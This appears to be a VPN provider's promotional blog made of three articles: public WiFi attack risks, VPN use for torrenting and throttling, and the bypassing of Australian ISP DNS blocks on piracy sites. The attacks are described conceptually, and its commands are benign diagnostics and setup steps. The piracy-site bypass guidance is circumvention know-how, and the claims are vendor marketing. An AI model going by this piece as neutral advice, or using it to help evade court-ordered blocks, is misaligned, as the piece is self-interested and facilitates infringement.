It’s an easy trap to fall into. Cellular data is expensive. In the US, 500 MB of pre-paid data costs an average of $85 US. If your contract doesn’t have a large data allowance, free WiFi is a godsend. However, that convenience comes with considerable risk to your privacy and security. If you’re not using a VPN at a public hotspot, you’re opening yourself up to all kinds of malicious attacks and data interception, such as the sslstrip man-in-the-middle attack (analysed below), online activity monitoring, computer hijacking, restricted online browsing and many more serious security threats.

Download a Free 7 day fully functional StrongVPN service. Unlimited download, strong encryption, supports all your devices!

Public - Guest WiFi Security Risks

The biggest misconception about open WiFi is that it offers the same protection as your home network. That couldn’t be further from the truth. The annoying password on your home network does much more than keep people from connecting. It encrypts your data so that those on the outside have trouble looking in.

By nature, guest WiFi has no password. In most cases, that means no encryption. With a simple tool, anyone on the network can see which websites you’re visiting. In some cases, they can even intercept the emails you send, the files on your computer, and passwords. It doesn’t matter if you’re at a high-security airport or the coffee shop down the road.

Even when an attacker isn’t around, you’re putting trust in the security of everyone else on the network. You may have the latest version of Windows 10, but the person next to you could have no security knowledge. Some forms of malware attempt to spread themselves to other people on the network, and the user probably doesn’t even know about it.

Common WiFi Attacks used at Internet Hotspots

Thankfully, WiFi snooping is on the decrease thanks to SSL encryption. This web standard is spreading across all the most popular sites, and you’ll notice it by the HTTPS icon in your browser (as seen in the image on the left). It means that while someone can see the URL you’re on, they can’t see your emails or the password you just typed in. Unfortunately, this won’t stop someone resourceful. In fact, SSL can be bypassed with a single tool.

In 2009, security expert Moxie Marlinspike introduced sslstrip. By routing a victim’s connection through their own machine, an attacker can redirect them to the HTTP version of the page. The browser won’t even detect this and the victim has no idea what’s going on.

Representation of how an sslstrip wifi attack works

The vulnerability comes from the fact that most users don’t type “https://” at the beginning of every URL. This means that when they first connect to the site, it’s over HTTP. Most websites will then redirect users to the HTTPS version, but sslstrip steps in and sends back HTTP instead. The attacker can then view all the user’s requests in plaintext, collecting whatever information they like.
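
You can see the window sslstrip exploits for yourself with the short Python sketch below, which requests the plain-HTTP address of a site and prints the redirect chain that upgrades it to HTTPS. It assumes the third-party requests package is installed and uses example.com purely as a placeholder domain:

import requests

# Follow the very first plain-HTTP request and record every redirect hop.
response = requests.get("http://example.com/", allow_redirects=True, timeout=10)

hops = [r.url for r in response.history] + [response.url]
print(" -> ".join(hops))

if response.url.startswith("https://"):
    print("The site upgraded the connection to HTTPS.")
    print("On a hostile network, sslstrip could intercept that first HTTP hop.")
else:
    print("The site stayed on plain HTTP - everything here is visible on the wire.")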

Though attackers often need specialist software and some technical knowledge, packages such as WiFi Pineapple can make so-called “man-in-the-middle” attacks relatively simple. In a few clicks, users can pretend to be a public network, routing traffic through them rather than to the router. From there, the attacker can force the user to visit websites with malware, install key loggers, and plenty of other shady things. It’s not too difficult, and with the aid of YouTube, a seven-year-old did it in eleven minutes.

In some cases, attackers don’t even need any experience to view your information. Oftentimes, users connecting to hotel WiFi forget to change Windows sharing settings. This makes it easy for anybody to view your shared files with no hacking required. Sometimes this isn’t even password protected, making it child’s play.

However, there are also tools that make more complex attacks simple. In 2010, a simple browser extension called FireSheep was released. The tool lets users capture the session cookies of anyone on the network visiting a website that doesn’t use HTTPS. Though many major websites such as Facebook and Gmail are protected, smaller sites often use HTTP, and many users have the same password for multiple sites.

Firesheep Firefox extension in action

Other tools let you do the same from an Android phone or other devices. And that’s assuming you’re connecting to the right network at all. A common method of attack is to set up a fake network, or honeypot. To the untrained eye, it won’t look out of place. Often, they will make sense in the context, named Starbucks WiFi, for example. In fact, an attacker owns it, and is logging everything you do. Our article configuring Windows 8 / 8.1 as an access point is a good example that shows just how easy it is to configure your workstation into a honeypot.

Hotel Hotspots - 277 Hotels Worldwide with Major Security Flaw

Hotels are one of the most vulnerable places for such attacks. They often have hundreds of people connected to the network at a time and hackers can stay in their rooms, undetected by anyone. Most hotels don’t have good security, and standardization means that many have the same, vulnerable hardware.

In 2015, for example, 277 hotels worldwide were found to be using ANTlab’s InnGate device. It’s used by much of the hotel industry to set up guest WiFi, including most of the top 10 chains. Unfortunately, it has a major security flaw, enabling hackers to gain access to users’ data, and sometimes even credit card data held by the hotel.

ANTlab’s InnGate WiFi client login page

Thankfully, ANTlab has since produced a software update to solve the issue, but it must be installed manually, and there's no way to tell if the hotel has applied the fix. This leaves a situation where you can never truly trust hotel networks.

Business executives should be particularly cautious. Russian security firm Kaspersky Lab discovered in 2014 that hackers were running a malware campaign code-named DarkHotel, targeting business leaders at hotels in Asia. DarkHotel is a targeted spear-phishing spyware and malware-spreading campaign that appears to selectively attack business hotel visitors through the hotel’s in-house WiFi network. When logging into the WiFi, a page asked them to download the latest version of Flash Player, Messenger or other software. The software was legitimate, but malware piggybacked on the install, stealing valuable data.

Business Guest WiFi Security

Businesses’ own networks can also be a significant target. Though many private corporate networks invest in security, guest internet is often open and unsecure. This puts clients or visitors at risk, and can also endanger employees using the wrong network. Unfortunately, a number of solutions fail to offer proper network encryption.

This opens users up to the dangers mentioned before, such as man-in-the-middle attacks. Browsing is open to snooping and could result in lost passwords, malware and more. Many routers try to circumvent the risk slightly by implementing a portal page, but this can lead to further problems.

In the case of some Linksys and Belkin routers, the page uses HTTP rather than HTTPS. That means that anyone sniffing WiFi traffic nearby can discover the password in plaintext when it’s typed in. Naturally, that gives them access to the network anyway, and possibly other logins if the password is re-used.

In addition, some guest networks still use Wired Equivalent Privacy (WEP) for protection. WEP is outdated, easily circumvented, and has long been succeeded by WPA and WPA2. In 2011, three Seattle-based hackers stole over $750,000 from local businesses using this method.

The three drove around with networking tools, looking for unsecure or accessible wireless networks and stealing data. Employee social security numbers, email addresses, company credit card numbers and other information was then sold on to third parties.

Staying Safe on Public Wi-Fi Networks & Internet Hotspots

Fortunately, there are several ways you can stay safe on public WiFi and protect both your information and clients. Firstly, check that you’re connecting to the right network. It’s stupidly easy for someone to create their own hotspot called “Hotel WiFi” and log all your connections. It always pays to ask an employee which WiFi you should connect to.

Before you connect, check your sharing settings. This will stop the average joe from seeing all your shared documents with a click. You can view them easily in Windows via Network and Internet > Change advanced sharing settings.

Disabling Network Discovery and File and Printer Sharing when connected to Public WiFi

You’ll want to disable both Network Discovery and File and printer sharing. This will make it harder for people to access all your documents. In OSX you’ll want to go to System Preferences > Sharing and untick all the boxes there.

While you’re at it, you may as well make sure your firewall is enabled. Users often disable it because of software constantly asking for permissions. However, having the firewall enabled is essential on guest internet. Though it’s not infallible, it will make it harder for attackers to poke around in your PC.

In Windows, you can simply type in firewall, and then click turn Windows Firewall on or off on the left side of the control panel. OSX is equally simple, and both let you set exceptions for public and private networks.

Users should also be keeping both their operating system and applications up to date. This is especially important for browsers and plugins like Flash and Java. Not only will this reduce the vulnerabilities on your computer, you won’t be fooled by the bogus update messages mentioned earlier.

Speaking of browsers, try to make sure you’re using HTTPS where possible. A simple way is to visit popular websites in HTTPS on a secure network and then bookmark them. When you’re in public, only use that bookmark to access your logon. Alternatively, extensions such as HTTPS Everywhere will force Chrome, Opera, or Firefox to use SSL encryption on all webpages that support it. This will protect you against sslstrip and is much more user-friendly.

If someone still manages to sniff your password, two-factor authentication can be a lifesaver. Most major email providers such as Gmail and Hotmail provide this service, as does Facebook. Essentially, it makes you enter a time-sensitive passphrase when connecting from a new device. This can be delivered via text, a mobile app, or email. The extra step can be enough to turn away most hackers.  

However, the only way you can be 100% sure is to not visit sensitive websites at all. Generally, it’s a bad idea to go on PayPal, online banking, or other such websites on guest WiFi. You can never be confident you’re truly safe, and that applies to mobile banking too. When you’re done browsing, you should consider disconnecting from WiFi or turning off your computer. The longer your PC is open and on the network, the longer an attacker has to find vulnerabilities.

All of these steps will help a lot with creating a secure public WiFi experience. However, the unfortunate truth is that a determined attacker can still bypass these measures. To significantly increase your safety, you’ll want to invest in a VPN Service Provider. While selecting a VPN Provider can be a time-consuming process our Best VPN services comparison will help considerably in the process of selection.

Secure WiFi Access and Identity Protection with VPN Service Providers

A Virtual Private Network is exactly what it sounds like. Simply, a VPN allows you to make a secure connection to a server over the internet. All your traffic goes through that server, with very strong encryption that makes it almost impossible to snoop. When you connect to an unprotected WiFi network, attackers will just see a load of random characters. Trying to circumvent that is simply not worth their time.

With a VPN Provider your PC creates a tunnel to send your data over the internet. Every piece of data sent over the internet is in chunks called packets. Each packet has part of the data, as well as other information like the protocol (HTTP/HTTPS) and the user’s IP address. When you connect to a VPN, that packet is sent inside another packet. As you would expect, the outer packet provides security and keeps the information from prying eyes.

With a VPN Provider all internet traffic is encrypted and secure

However, as mentioned before, data is also encrypted. How exactly this is achieved depends on the security protocol of the VPN client. Using the Best VPN Protocol is important to ensure your VPN connection has the most suitable encryption depending on your online usage. Following is a quick rundown of the various encryption methods VPN providers use:

  • PPTP – Point-to-Point Tunnel Protocol: Supported by most VPN providers, this is an obsolete and insecure protocol. Its encryption is weak and considered broken; it creates a Generic Routing Encapsulation (GRE) tunnel between the two endpoints (client – server) and encapsulates all traffic inside the tunnel. Because of the encapsulation process PPTP can suffer from slow performance if there is not enough bandwidth available.
  • L2TP / IPSec: Layer 2 Tunnel Protocol is considered the evolution of PPTP, coupled with IPSec for encryption. It’s a highly secure protocol offered by most VPN service providers and delivers a high level of confidentiality.
  • SSTP – Secure Socket Tunnel Protocol: A fairly new tunnelling protocol that relies on SSLv3/TLS for encryption, which means SSTP is able to pass through most firewalls and proxy servers using TCP port 443 (HTTPS). SSTP is supported by Microsoft Windows Vista SP1 and later, plus RouterOS. As with most IP-tunnelled protocols, SSTP performance can be affected if there is not enough bandwidth available.
  • OpenVPN: One of the latest VPN protocols, offering great security and flexibility. OpenVPN is maintained by the open-source community and relies on OpenSSL to provide encryption. OpenVPN can utilize both UDP and TCP, making it a highly desirable alternative to IPSec when IPSec is blocked. OpenVPN supports up to 256-bit encryption and many vendors, e.g. VPN Service Providers, have implemented it in their products.

Additional Benefits of Using a VPN at Hotspots & Public Wifi Networks

As well as data protection, VPNs provide other benefits on public WiFi - Hotspots. Due to the nature of tunnelling, VPNs can be used to bypass content restrictions. This can be particularly useful on guest internet, which often has filtering policies in place.

They also give you some anonymity when connecting to the web. The website you’re connecting to sees your connection is coming from wherever the VPN Server is located, not your physical (real) location. Moreover, as all of your information is encrypted, the broadband service provider can’t spy on you either. This has the bonus of protection from surveillance by the government or other parties. For a journalist or lawyer, that can be essential.

However, not all VPNs are created equal. The protection your VPN hotspot provides depends largely on which of the above protocols they use and how the data is stored. Some VPN services keep a log of every site you visit and from which IP address. Naturally, that removes some degree of anonymity.

This is particularly relevant if they’re located in one of the so-called ‘five-eyes.’ The US, UK, Canada, Australia, and New Zealand all share the data from their intelligence agencies. In many cases, VPN providers must legally hand over user data to the government on request. The only way VPN hotspots can circumvent this is by not keeping logs at all. For someone just wanting to stay safe on public WiFi, that’s not much of a concern. If you’re looking for the full package, though, it’s worth looking up their policies.

Of course, some providers offer VPN functionality free of charge. Unfortunately, these are often subject to data caps, advertisements, or other money-making methods. In some cases, free providers have sold user bandwidth or connection data. Though they’ll do in a pinch, free VPNs are no substitute for a paid service. If you go free, it’s best to do some research beforehand.

There’s also availability to consider. Most paid VPN Services support all the major devices and operating systems, such as Windows, OSX, Linux, iOS, Android and routers. That means you can be protected on all your devices, but not necessarily all at once. The limit of devices you can connect varies depending on provider, anywhere between 2 and 6. The majority support 4 or 5 devices, but this can change depending on your plan.

Despite this, it’s easy to get a VPN set up on any device. Though some don’t support less popular platforms like Windows 10 Mobile, it’s usually possible to set them up manually via a built-in settings menu.

For more obscure devices like a DS or PS Vita, or just to avoid setup, you can share your VPN connection from a PC. This essentially acts as a separate VPN hotspot, meaning you’ll have your own password-protected WiFi network that’s secure and encrypted. You can set one up on a Windows PC with the following steps or read our Windows WiFi Hotspot article:

  1. Connect your PC to the internet over Ethernet or WiFi
  2. Hit Start, type cmd and run Command Prompt as an administrator
  3. Type netsh wlan show drivers
  4. Check that the field Hosted network supported reads Yes
  5. Type netsh wlan set hostednetwork mode=allow ssid="VPN hotspot" key="MyP@$$!"
  6. Type netsh wlan start hostednetwork
  7. Go to Control Panel > Network and Sharing Center and click Change adapter settings
  8. Find the relevant VPN adapter and click on Properties
  9. Go to the Sharing tab and tick Allow other network users to connect through this computer’s internet connection
  10. Start up your VPN and connect to the new VPN hotspot from any device

This is a good solution if you have multiple people in a hotel suite or café, and saves downloading an app on every device. For easier setup, you can download a tool like Virtual Router Manager. You’ll still need a compatible WiFi card, but you can set up the VPN hotspot in just a few seconds.

Another great solution for home or office environments is to configure your router to connect to your VPN Provider. A solution like this allows you to share your VPN connection with all devices on your network without having to configure each one separately with a VPN client.

Summary

You can never be truly safe on Public or Guest WiFi. Whether you’re in a hotel, café or on a business guest network, a determined attacker may be able to find a way. Regardless of how safe you think you are, it’s always worth avoiding sensitive logins while on an unsecure connection.

If you do have to connect, a VPN will significantly reduce the risk. For most attackers, it will be more hassle than it’s worth. Setting up a VPN hotspot can extend this protection to any device, so friends and family have little reason to be unsafe.

Naturally, VPNs aren’t infallible. Users still need to watch out for fake WiFi portals, which may launch in the time between connecting to a network and launching the VPN. This short window may also give the attacker information about your system or other clues to help them.

However, in combination with other measures, a VPN is possibly the best protection you’ll find. Without a VPN, hotspots just aren’t secure and, considering what’s on the line, $3 to $8 US a month for a fast & secure VPN service is a complete bargain.


VPN For Torrenting, P2P and File Sharing. Test Anonymous Torrenting, Avoid Bandwidth Throttling, Protect Your Identity

The word torrenting is often viewed as synonymous with pirating. It’s seen as a shady and illegal practice, used to con hard-working artists out of their money. As a result, internet service providers often blanket-ban torrent websites or severely throttle downloads. If you aren’t using a VPN for torrenting, there’s a good chance you’re affected by this. However, ISPs’ over-arching policies can hurt users who use Peer-to-Peer (P2P) file sharing for innocent purposes.

How Torrenting & Peer-to-Peer (P2P) Works

Instead of using dedicated servers, P2P utilizes the connections of other users to distribute files. As they download a torrent, the individual also uploads a small portion for others to download. This creates an interconnected network where files are provided by many different people.

One huge example of legal P2P usage is gaming. Online games such as World of Warcraft, League of Legends, and downloads from UPlay all have a P2P option. This saves on server costs for the developers and can increase torrent speed. This can foster development for smaller, indie companies, who might not have the infrastructure for lots of servers.

Download Torrents Safely & Bypass any geo-location restrictions using StrongVPN Client

In fact, Windows 10 even takes advantage of this method to save on bandwidth issues. The OS delivers updates in multiple parts, pulling bits from both PCs on the same network, over the internet, and Microsoft’s own data centers. This feature is turned on by default since the Windows 10 Anniversary Update in the summer of 2016.

However, more important is the role of torrenting in distributing public data. The Internet Archive caches huge numbers of websites and offers a wide variety of public domain books, TV shows, and audio recordings. The non-profit recommends the use of torrents to download its content, as this saves on bandwidth and allows it to continue its vital work.

This role extends even to government. NASA has used torrents several times in the past to distribute its findings, including this high-resolution picture of earth. The UK government has done similarly, releasing large datasets on public spending via BitTorrent.

As well as supporting government, BitTorrent is also used to oppose it. Transparency sites such as Julian Assange’s WikiLeaks often release so-called ‘insurance files’ through torrents. Shortly before the leak of Hillary Clinton’s emails, the site published an 88 GB, AES-256-encrypted file. This keeps the organization from being shut down – if WikiLeaks goes dark, an automated message sends out an unlock password for all the data. In previous cases, files have reached upwards of 400 GB.

Despite the genuine uses of P2P, users still get attacked by copyright claimants, sometimes inaccurately. In 2015, the creators of B-movie Elf Man filed a lawsuit against hundreds of users who claimed to have never even heard of the movie. Ryan Lamberson was one of these defendants and was eventually reimbursed for $100,000 in legal fees. Closer examination of evidence revealed that the tools used by the copyright holder did not account for several shortcomings, and only tracked uploads rather than downloads.

The defense also pointed out that the primary evidence was little more than an IP address. This information came from a third-party software that connected to the BitTorrent swarm in which the files were shared. However, some torrent software allows for the spoofing of IP addresses, and the investigator failed to account for several other false positives. Because of the win, several other Elf Man cases were dropped or settled for a lower value.

Other dismissed cases include those surrounding the Adam Sandler movie The Cobbler, and that of a 53-year-old painter who was wrongly accused of illegally downloading and sharing 18 films and TV shows. Thankfully, there is a simple way to avoid such risks.

Anonymous Torrenting with a VPN Service

Using a VPN for torrenting will ensure your identity remains private, not just from ISPs, but copyright claimants and government. When you connect to a VPN, all your traffic goes through a “tunnel”. The individual packets that make up your data contain information such as IP Address, protocol, and other identifying information.

Tunneling wraps those packets in others that provide extra security against prying eyes. In addition, the data is encrypted in transit, meaning ISPs, service providers and other middlemen see nothing but gibberish. Different providers use different encryption methods, the most common being IPSec, L2TP and OpenVPN.

The benefit of this tunneling is clear. An ISP or copyright holder can only see the IP address of the VPN server, not your own. This makes for anonymous torrenting, and they can’t see what websites you’ve visited either. Though this might not protect you against entirely baseless accusations, it should stop you from coming under genuine suspicion.

A VPN for torrenting will also provide you with protection in other ways. To stay safe on public WiFi, they are almost essential. Without one, attackers can snoop on your online traffic, possibly recovering passwords and credit card details. You could also be vulnerable to malware on your machine and tracking from third parties.

However, not all VPNs are created equal. Though some provide anonymous torrenting and public WiFi protection, others are questionable at best. Researching hundreds of different providers can be a pain, so instead we’ve done that for you. Our network security team has produced a VPN service review of all the Best VPN Service Providers, alongside detailed feature lists.

Finally, our Beginners Guide to VPNs article aims to educate users with all the necessary information so they can fully understand how a VPN works, the security features offered by the best VPN service providers, what to look for in a VPN and what to stay away from.

Avoid ISP Bandwidth Throttling

Encrypted communication has the added benefit of avoiding bandwidth throttling from ISPs. As mentioned earlier, service providers inspect packets to classify different data. This lets them put a speed cap on specific mediums. This is usually done unofficially, and some service providers will deny the practice despite significant evidence to the contrary.

Despite this, it’s becoming more and more routine for ISPs to throttle or block torrent downloads. Everything you receive goes through their servers, allowing them to analyse it with Deep Packet Inspection. This method lets the service provider look at different data packets and classify it into different categories, such as video, music, and torrents.

Bandwidth throttling can be achieved in several ways. One method is blocking router ports often used for BitTorrent. Typically, P2P downloads go through TCP ports from 6881-6889. By limiting the speed on these, an ISP can cut out a big chunk of bandwidth.
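
The crudest form of this classification is purely port-based, as in the toy Python sketch below. Real Deep Packet Inspection looks inside packet payloads rather than just at port numbers, and the mapping shown is a simplified assumption:

def classify(dst_port: int) -> str:
    # Toy port-based traffic classifier - real DPI inspects packet contents.
    if dst_port in (80, 443):
        return "web"
    if 6881 <= dst_port <= 6889:      # classic BitTorrent listening ports
        return "bittorrent"
    return "other"

for port in (443, 6882, 51413):
    print(port, "->", classify(port))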

However, this method is becoming less and less popular. Increasingly, torrent clients randomize TCP ports or tell users if there are any issues. As a result, internet service providers use methods that are harder to dodge.

One such technique is called traffic shaping. The flow of certain packets is delayed in favour of others, affecting download and upload speed. This can be done as a blanket, or through intelligent burst shaping. Burst shaping increases torrent speeds for a short period, before gradually returning to a lesser speed. Thus, extended downloads such as movies, games, and streaming are slower, while web pages still load quickly.

The need for shaping comes from the limited bandwidth resources of an ISP. It lets the service provider guarantee performance to other users by reducing the effect of heavy users. Often, P2P is the main target for this, and it’s easy to see why. Torrent downloads use large amounts of bandwidth and therefore cost a lot of money to sustain. In addition, companies are under a lot of legal pressure from copyright holders. By throttling, they can assure these parties that they’re doing their bit to limit the impact of pirates.

Unfortunately, it’s difficult to differentiate between legal P2P downloads and illegal ones. This means that regular users can be throttled due to blanket policies. You can check if your torrents are being throttled by running the Glasnost test (no longer developed). The eight-minute download will detect bandwidth throttling in the upload and download streams separately.

We tried the Glasnost test, which failed to confirm our suspicions of BitTorrent bandwidth throttling:

Glasnost failed to detect any BitTorrent Bandwidth Throttling for our connection

There are many cases where the Glasnost test will not accurately detect BitTorrent bandwidth throttling; in those cases, personal experience has to confirm the suspicion.

BitTorrent without a VPN provided a Max Download Speed of 1.2Mbps

If you find an issue with your broadband provider, there are still steps you can take to avoid throttling. Using a VPN for torrenting will ensure your ISP can’t categorize that data. If they don’t know it’s happening, they probably won’t throttle it, which will result in faster speeds.

How a VPN Can Increase Torrent Speeds – Real Example Avoiding BitTorrent Bandwidth Throttling

VPN speed increases are often quite significant. The exact difference depends on your ISP, but torrent speeds can double or triple. This is despite the added latency of encryption and cross-continent connections.

In our tests, we found an increase in BitTorrent download speed from a paltry 1.3Mbps max to a whopping 3.1Mbps max using our StrongVPN connection. This test was carried out on a completely legal download of CentOS, showing that ISPs don’t make exceptions. This reduced the ETA of the download significantly, bringing it to an acceptable time.

BitTorrent traffic over VPN with StrongVPN increased our download speeds by almost 3 times

It’s worth noting that using a VPN for torrenting doesn’t necessarily mean you’ll get the full speed of your internet connection. The speed at which you can download depends on many factors, including the plan you have with your ISP, how busy your local ISP exchange is, the VPN provider and VPN server you’ve connected to, that server’s maximum upload bandwidth, the type of encryption selected for the VPN and more.

For example, torrenting over stronger AES-256 encryption results in a slower connection than AES-128. The latter also provides less protection (weaker encryption), so the best fit depends on your usage scenario. The type of data authentication also makes a difference. Data authentication prevents so-called active attacks, where an attacker gets between you and the VPN server and injects or modifies data. SHA1 is the fastest method, but SHA256 is also common. It’s worth checking what options are available before you buy a VPN for torrenting.
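If your provider hands out raw OpenVPN configuration files rather than a custom client, these trade-offs can usually be adjusted when launching the connection. The switches below are standard OpenVPN options, but the file name and the cipher/authentication values are only examples and must match what your provider’s servers actually accept:

  rem Connect with a faster 128-bit cipher and SHA256 data authentication
  openvpn --config client.ovpn --cipher AES-128-CBC --auth SHA256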

Ensuring Your VPN for Torrenting is Protecting You

Despite these protection methods, you still may not be safe torrenting on certain VPNs. Some providers have strict policies on P2P downloads, often due to the legal situation in the country they operate from. None officially support illegal activity and, if your provider keeps logs, it may be forced to hand them over to authorities or copyright holders.

A free VPN for torrenting is especially risky. Fighting copyright holders takes a lot of time and resources, and most companies will only protect paying customers. They can also come with data caps or sell your details, so it’s usually worth paying a small monthly fee for true anonymous torrenting.

Paid services have a vested interest in keeping consumers safe from copyright holders. As a business, their reputation depends on delivering what is advertised and keeping users safe. It’s always worth checking the provider’s policies before signing up.

However, there are also issues that can stem from the individual user, rather than the VPN provider. Your IP address may be revealed through a DNS Leak or other means. This is easy to check and can be done straight from your browser.

One of the most popular online tools is ipMagnet. First, visit the site with your VPN connected. Loading the web page should display the IP address assigned by your VPN provider, not the IP address assigned by your ISP. Once this has been verified, hit the blue Magnet link text shown below:

ipMagnet allows BitTorrent users to verify they are not exposing their real IP address

You will then be prompted to add the file to the BitTorrent application of your choice. The link points to a fake file, and the embedded tracker is controlled by ipMagnet, which archives the information and returns it to you. The download is completely legal and the files shouldn’t take up any space on your hard drive. Moreover, the source code of ipMagnet is freely available online. It’s best to let this run for a while until multiple lines show in the table:

ipMagnet in Action reveals our VPN Service Provider is not exposing our real IP address

You can also see the IP address under the trackers section of your BitTorrent client. The message field should only display the IP address shown in your VPN client and will be updated if anything changes. If any entry displays your real IP address (the one assigned by your ISP), you have a problem: your real IP address is leaking and is visible to your peers and snoopers.

The best way to avoid such leaks is through a Kill Switch. This feature is often found within reliable VPN service providers or BitTorrent clients and shuts off your connection if the VPN for torrenting drops out. With reliable providers, this doesn’t happen often, but a few seconds is all it takes to expose your identity.

Set Up a VPN Kill Switch in qBittorrent

Some torrent clients have Kill Switch functionality built-in. This is true for popular clients such as qBittorrent, Vuze, and uTorrent and can help enforce anonymous torrenting. You can follow this guide to enable it for qBittorrent in Windows 10:

  1. Hit the Windows key and type Network and Sharing Center. Press Enter.
  2. Click Change adapter settings in the left side panel.
  3. In the Network Connections window, identify the adapter your VPN uses. For us, it was an Ethernet TAP-Windows Adapter you can see as Firewall VPN:

    qBittorrent setup network
  4. Open qBittorrent on your system.
  5. Select Tools > Options. Click the Advanced tab.
  6. In the Setting column, look for Network Interface.
  7. Set the drop-down menu to the previously identified adapter (Firewall VPN).
  8. Click OK.
  9. Restart qBittorrent.

Note that you need to fully quit qBittorrent for this to work. That means right-clicking on the icon in the system tray and clicking Exit. On start, you should notice that your download speed won’t budge from zero unless you enable your VPN. As soon as you start it up again, you’ll see an increased torrent speed.

Set Up a VPN Kill Switch With Comodo Firewall

If neither your VPN nor your torrent client offers a Kill Switch, you’ll have to look elsewhere. Comodo Firewall is a good, tried and tested alternative. The setup is more complex, but it ensures stable privacy and less fiddling later. First, you need to find the VPN adapter’s physical (MAC) address. To start, type cmd in the Start menu and run it as an administrator.

Then type ipconfig /all and look for the adapter that says TAP-Windows Adapter in the Description field. Note down the Physical Address, and start Comodo Firewall:
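If the full ipconfig /all output is hard to scan, the same information can be filtered down to just the adapter descriptions and their physical addresses (a small convenience on top of the command above; findstr matches any line containing either word):

  rem Show only the Description and Physical Address lines of each adapter
  ipconfig /all | findstr /i "Description Physical"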

comodo firewall MAC address

You’ll then want to set up a new network zone. Go to Settings > Firewall > Network Zones and select Add > New Network Zone. Name it VPN for Torrenting and press OK.

Comodo Network Zone Setup for Torrenting

Your new zone should now show up in Comodo. Select it and click Add > New Address. Change the type to MAC Address and input the physical address from earlier:

comodo firewall 3

Now you’ll want to create some rules. Go to Firewall > Rulesets and hit Add. Name it Kill Switch Ruleset. You can then add three separate rules to it with the following settings:

Rule 1:
  • Action: Block
  • Protocol: IP
  • Direction: In or Out
  • Source Address: Any Address
  • Destination Address: Any Address

Rule 2:
  • Action: Allow
  • Protocol: IP
  • Direction: Out
  • Source Address: Network Zone/VPN for Torrenting
  • Destination Address: Any Address

Rule 3:
  • Action: Allow
  • Protocol: IP
  • Direction: In
  • Source Address: Any Address
  • Destination Address: Network Zone/VPN for Torrenting

Comodo Firewall Ruleset for Torrent Kill Switch

Hit OK and you’re almost done. In the Application Rules section of Advanced Settings, you can add any application you want the Kill Switch Ruleset to apply to. In this case, we want to add our torrent client. Browse to the location of the program and add it to the rule. Finally, check Use Ruleset and select Kill Switch Ruleset.

By using one or all of these methods, you will ensure your VPN doesn’t leak your identity when it goes down. To be certain, run another test on ipMagnet with your VPN enabled and disabled. No IPs should appear when you aren’t connected.

VPN Port Forwarding & NAT Firewalls

Unfortunately, some users will still have problems downloading torrents with a VPN enabled. This is usually due to the use of VPN NAT firewalls. Your router’s built-in NAT firewall blocks incoming traffic unless it’s in response to a request you made, but the encrypted nature of VPN tunneling means you lose that protection.

As a result, most VPN providers set up their own NAT firewalls that sit between their servers and the internet. This feature is usually presented as an optional toggle and offers much of the same protection. It can also result in issues when you’re using a VPN for torrenting.

NAT firewalls can make your connection slower, offsetting much of the anti-throttling advantages. To avoid this, you’ll have to set up a port in the firewall that lets P2P traffic through. This is generally called VPN port forwarding.

With some VPNs, port forwarding can be enabled from the settings menu. A simple toggle is usually enough to solve any issues, but naturally, this can reduce security slightly.

VPN Port Forwarding in Private Internet Access

To get maximum efficiency, you will want to port forward via the torrent client too. qBittorrent and other clients enable NAT-PMP and UPnP by default, which automates the process. In other scenarios, you may have to manually enter the port in your torrent client. The five-digit port number is usually displayed on connection or inside the VPN client window.

If your provider doesn’t give you a VPN port forwarding number or settings toggle, it’s worth contacting them directly via email. Sometimes ports are provided on request rather than to everyone. In other cases the provider port forwards by default but doesn’t inform the user.

Summary

All the aforementioned methods will help keep your identity and wallet protected. In the case of torrent throttling, you will be one step closer to getting the connection speeds you pay for. Moreover, careful application will make it extremely difficult for anyone to verify your identity and hand out hefty fines.

Despite this, using a VPN for torrenting doesn’t mean you’re completely immune. Some ISPs will throttle all encrypted traffic, or target individual users who use a lot of bandwidth. A failed Kill Switch can also give you away, though such failures are rare. Port forwarding can cause issues on occasion, making you more vulnerable to other kinds of attacks.

Finally, the precautions are next to useless if you don’t choose a trusted and logless VPN provider in the first place. As the market grows it’s becoming increasingly important to find the Best VPN Service Provider for you through reliable VPN service reviews. If you use P2P file sharing, that means a provider that supports those methods and won’t hand over your IP to third parties.


How Australians Are Bypassing ISP Blocking of ThePirateBay, Torrentz, TorrentHound, IsoHunt and Streaming Service Sites

It was just a matter of time until the new global wave of government site blocking at the ISP level arrived in Australia. In mid-December 2016, the Federal Court ruled that Internet companies would need to block sites such as ThePirateBay, Torrentz, TorrentHound, IsoHunt and the streaming service SolarMovie. Australian ISPs were given 15 days to comply with the decision and implement blocking mechanisms to make it more difficult for users to gain access to these sites; however, it seems the blocks were bypassed by Australian users in just a few seconds.

The deadline for the ISPs to implement the blocking was the 31st of December, so from the 1st of January 2017 access to the above-mentioned sites would be denied.

Download Torrents and access restricted content safely from anywhere in the world!

Accessing ThePirateBay and other Blocked Sites from Australia

Currently, when an Australian online user tries to access any of the 5 sites they are presented with the following website:

The Piratebay blocked by a large Australian ISP

Australia’s mobile network providers are also blocking access to the above sites presenting their users with a similar website.

No matter which ISP or mobile network users are coming from, they now all receive a message stating access to the selected sites is disabled.

How ISPs are Blocking ThePirateBay, Torrentz, TorrentHound, IsoHunt & SolarMovie

There are a number of different ways an ISP can choose to block access to the above sites in order to comply with the Federal Court ruling. These include blocking IP addresses, DNS blocking, URL blocking or any other method mutually agreed by the ISPs and rights holders.

At the moment Telstra, Optus and Dodo, which are amongst Australia’s largest ISPs for home, business and mobile users, are implementing DNS blocking. When users on their networks send a DNS request for a blocked domain to the ISP’s DNS servers, they are redirected to one of the sites specifically set up for the block.

The ISP block is affecting all of Australia’s mobile users

Optus DNS Blocking redirects users to a different website when trying to access ThePiratebay.org

This is also clearly evident when performing a simple nslookup query. In the example below, we queried Optus’s DNS server for www.thepiratebay.org and saw it pointed us to IP addresses 13.54.13.201 & 54.79.39.115 which do not belong to ThePirateBay:

Nslookup shows how easy it is to bypass DNS blocking and access any DNS-blocked site

After switching to Google’s public DNS servers, we received different IP addresses for www.thepiratebay.org and were able to successfully access the website, along with all the other blocked websites.
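You can reproduce this check yourself from a command prompt. The first query uses whatever DNS server your connection is currently configured with (normally your ISP’s), while the second explicitly asks Google’s public resolver at 8.8.8.8; if the two answers differ, the ISP’s server is rewriting the response:

  rem Ask the currently configured (ISP) DNS server
  nslookup www.thepiratebay.org

  rem Ask Google's public DNS server directly
  nslookup www.thepiratebay.org 8.8.8.8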

Bypass DNS Blocking in Australia with a VPN Service

